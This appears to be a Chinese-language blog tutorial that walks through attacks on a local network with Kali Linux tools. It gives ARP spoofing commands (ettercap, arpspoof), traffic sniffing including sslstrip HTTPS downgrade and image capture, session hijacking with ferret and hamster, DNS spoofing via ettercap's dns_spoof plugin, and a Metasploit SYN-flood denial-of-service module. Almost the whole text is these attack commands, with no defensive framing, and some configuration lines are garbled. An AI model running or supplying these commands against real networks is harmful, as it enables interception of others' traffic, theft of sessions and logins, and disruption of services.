基于Kali Linux实现ARP欺骗、嗅探、DNS欺骗、DOS攻击

基于Kali Linux实现ARP欺骗、嗅探、DNS欺骗、DOS攻击

更改配置
Metasploit
Kali Linux
arp欺骗
ettercap
session劫持
dns欺骗
arpspoof
DOS攻击

一、更改配置

vi ./etc/Network-manager restart
#修改false为ture
service network-manager restart
vi ./etc/ettercap/etter.conf
ec_uid/ec_gid 全改成0
if you use iptables 后面内容去注释

二、arp欺骗、嗅探

(1)ettercap

echo 1 >>/proc/sys/net/ipv4/ip_forward
ettercap -i 网卡 -Tq -M arp:remote /目标IP/网关/ (也可以写作:// //)
#局域网内全ip、所有网关 i:网卡  Tq:文本模式

只有ettercap可以抓取文字,且ettercap集成了DNS欺骗插件

(2)arpspoof

echo 1 >>/proc/sys/net/ipv4/ip_forward
arpspoof -i 网卡 -t 网关 目标IP  
#通说是: 目标 网关
#断网
arpspoof -i 网卡 -t  网关 目标IP

实现欺骗后,嗅探:

#(嗅探)将https链接还原为http
sslstrip -a -f -k

#查看图片
driftnet -i eth0

#session劫持
tcpdump -i eth0 -w qq.cap
ferret -t qq.cap (64位下需要安装)
hamster
http://hamster

三、DNS劫持

(1)使用ettercap进行arp欺骗

(2)修改etter.dns文件

echo 1 >>/proc/sys/net/ipv4/ip_forward
ettercap -i 网卡 -Tq -M arp:remote // //

vi /etc/ettercap/etter.dns

在这里插入图片描述

(3)启用dns_spoof

  • 在运行中的ettercap中输入p

在这里插入图片描述

  • 输入 dns_spoof 激活插件

四、DOS攻击(潮汐攻击)

#进入Metasploit
msfconsole
#进入潮汐攻击目录
use auxiliary/dos/tcp/synflood 服务器地址
#show命令 显示需要填写(yes的必填)的内容
show options
#set命令 写内容
set rhost 目标服务器
#执行
exploit

另外(防呆不防傻):

目标ip查询: fping -asg 192.168.自己IP位置(一般只有一位).0/24
网卡、ip查询: ipconfig (win)  ifconfig (linux)
  • 19
    点赞
  • 58
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

邓大帅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值